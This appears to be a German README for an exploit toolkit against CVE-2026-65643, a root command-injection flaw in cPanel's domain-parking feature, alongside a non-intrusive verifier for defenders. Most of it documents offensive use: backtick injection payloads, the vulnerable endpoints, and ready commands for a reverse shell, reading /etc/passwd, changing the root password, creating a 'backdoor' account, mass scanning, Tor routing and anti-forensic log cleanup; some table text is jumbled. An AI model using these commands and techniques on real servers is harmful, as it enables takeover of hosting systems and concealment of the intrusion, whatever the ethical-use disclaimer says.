
Red/Blue-Team-Toolkit für CVE-2026-65643, eine RCE-Lücke im cPanel-Domain-Parking. Enthält Exploit mit Reverse Shell, Webshell, Persistenz und Massen-Scanning sowie einen nicht-intrusiven Verifizierer für Erkennung und Auditing.

⚠️ NUR FÜR ETHISCHEN EINSATZ – AUTORISIERTE SICHERHEITSTESTS Dieses Repository stellt Werkzeuge ausschließlich für autorisierte Sicherheitsexperten, Blue Teams und Penetrationstester bereit. Unautorisierter Zugriff auf Computersysteme ist illegal gemäß CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Türkei) und ähnlichen Gesetzen weltweit.
CVE‑2026‑65643 ist eine kritische Command-Injection-Schwachstelle in cPanel & WHM Version 11.x, die es einem authentifizierten cPanel-Benutzer ermöglicht, beliebige Systembefehle mit Root-Rechten über die Domain-Parking-Funktionalität auszuführen.
`) injizieren kann.| Werkzeug | Zweck | Zielgruppe |
|---|---|---|
exploit.py | Vollständig ausgestattetes Toolkit mit Reverse Shell, WebShell, Persistenz, Datei lesen/schreiben, Root-Passwort-Änderung, Massenscanning, Tor-Unterstützung und OPSEC-Funktionen. |
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt
requests
urllib3
exploit.py Parameterverifier.py ParameterDer Exploit verwendet die folgenden cPanel-Endpunkte und Injektionsmethoden:
# Injektions-Payload-Format
test.com`<befehl>`
# Beispiel
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`
Diese Software wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.
| Red Teams / autorisierte Pentester |
verifier.py | Nicht-intrusiver Schwachstellenprüfer, der die cPanel-Version erkennt, die Injection validiert und das Risiko bewertet, ohne bösartige Payloads auszuführen. Erstellt detaillierte Berichte. | Blue Teams / Sicherheitsauditoren |
| Funktion | exploit.py | verifier.py |
|---|
| Schwachstellenerkennung | ✅ | ✅ |
| Versionserkennung (4 Endpunkte) | ✅ | ✅ |
| Command Injection | ✅ | ❌ |
| Reverse Shell | ✅ | ❌ |
| WebShell-Upload | ✅ | ❌ |
| Persistenz (cPanel-Benutzererstellung) | ✅ | ❌ |
| Root-Passwort-Änderung | ✅ | ❌ |
| Datei lesen/schreiben | ✅ | ❌ |
| 4 Injektionsmethoden (JSON/Form/CGI/API2) | ✅ | ✅ |
| Tor-Unterstützung (Anonymität) | ✅ | ❌ |
| User-Agent-Rotation (OPSEC) | ✅ | ❌ |
| Jitter (OPSEC) | ✅ | ❌ |
| Massenscanning (Multi-Thread) | ✅ | ❌ |
| Interaktive Shell | ✅ | ❌ |
| Nicht-intrusiver (sicherer) Modus | ❌ | ✅ |
| Zeitstempel-Protokollierung | ✅ | ✅ |
| HTML-Bericht | ✅ | ❌ |
| JSON-Bericht | ✅ | ✅ |
| Log-Bereinigung (Anti-Forensik) | ✅ | ✅ |
| Proxy-Unterstützung | ✅ | ✅ |
| Benutzerdefinierter User-Agent | ✅ | ✅ |
| SSL-Verifizierungssteuerung | ✅ | ✅ |
| Szenario | Empfohlenes Werkzeug |
|---|
| Blue Team – Überprüfung, ob Ihre cPanel-Installation verwundbar ist | verifier.py |
| Sicherheitsaudit – nicht-intrusive Schwachstellenbewertung | verifier.py |
| Red Team – autorisierte Penetrationstests mit vollständiger Ausnutzung | exploit.py |
| Bug Bounty – verantwortungsvolle Offenlegungstests | verifier.py |
| Massenscanning – Überprüfung mehrerer Ziele auf Schwachstellen | exploit.py (nur Erkennung) |
| Incident Response – Überprüfung, ob Systeme kompromittiert sind | verifier.py |
| Parameter | Beschreibung |
|---|
-t, --target | Ziel-cPanel-URL (z. B. https://cpanel.example.com:2083) |
-l, --target-file | Datei mit Liste der Ziele (eine pro Zeile) für Massenscanning |
-u, --username | cPanel-Benutzername |
-P, --password | cPanel-Passwort |
-p, --port | cPanel-Port überschreiben (Standard aus URL oder 2083) |
--threads | Anzahl der Threads für mehrere Ziele (Standard: 10) |
-o, --output | JSON-Bericht in Datei speichern |
--html-report | HTML-Bericht in Datei speichern |
-v, --verbose | Ausführliche Ausgabe |
--proxy | HTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080) |
--tor | Über Tor leiten (localhost:9050) |
-ua, --user-agent | Benutzerdefinierter User-Agent |
--no-keep-alive | Session nicht am Leben halten |
--delay | Verzögerung zwischen Anfragen (Standard: 2,0 s) |
--jitter | Zufälliger Jitter (0–1 s) zwischen Anfragen (Standard: 0,5) |
--max-retries | Maximale Wiederholungsversuche (Standard: 5) |
--ssl-verify | SSL-Zertifikate verifizieren |
--timeout | Anfrage-Timeout (Standard: 15 s) |
--cmd | Einzelnen Befehl auf dem Ziel ausführen |
--reverse-shell | Reverse-Shell-IP:PORT |
--passwd | Root-Passwort ändern |
--adduser | cPanel-Benutzer erstellen (BENUTZER DOMAIN PASSWORT) |
--read | Datei lesen |
--write | Datei schreiben (Pfad angeben) |
--write-content | Inhalt zum Schreiben |
--cleanup | Logs und Verlauf nach der Ausnutzung bereinigen |
-i, --interactive | Interaktive Shell nach der Ausnutzung |
--domain-suffix | Suffix für geparkte Domain (Standard: exploit.local) |
| Parameter | Beschreibung |
|---|
-t, --target | Ziel-cPanel-URL (z. B. https://cpanel.example.com:2083) |
-u, --username | cPanel-Benutzername |
-P, --password | cPanel-Passwort |
-o, --output | JSON-Bericht in Datei speichern |
-v, --verbose | Ausführliche Ausgabe |
--proxy | HTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080) |
--tor | Über Tor leiten (localhost:9050) |
--ssl-verify | SSL-Zertifikate verifizieren |
--timeout | Anfrage-Timeout (Standard: 15 s) |
--cleanup | Logs nach dem Test bereinigen |
| # | Szenario | Befehl |
|---|
| 1 | Schnelle Schwachstellenprüfung | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass |
| 2 | Detaillierter Scan mit Bericht | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v |
| 3 | Reverse Shell | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | Befehl ausführen | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami" |
| 5 | Sensible Datei lesen | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | Root-Passwort ändern | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | Neuen cPanel-Benutzer erstellen (Persistenz) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | Interaktive Shell nach der Ausnutzung | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | Massenscanning aus Datei | python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json |
| 10 | Proxy, Tor und benutzerdefinierten User-Agent verwenden | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0" |
| 11 | Logs nach der Ausnutzung bereinigen | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup |
| Methode | Endpunkt | Beschreibung |
|---|
| JSON-API | /cpsessXXXXX/json-api/domain | Primäre Injektionsmethode über JSON-Payload |
| Formulardaten | /cpsessXXXXX/json-api/domain | Alternative Injektion über formularcodierte Daten |
| CGI-Skript | /cgi-sys/domainpark.cgi | Legacy-CGI-Endpunkt-Injektion |
| API2 | /cpsessXXXXX/json-api/cpanel | Legacy-API2-Injektionsmethode |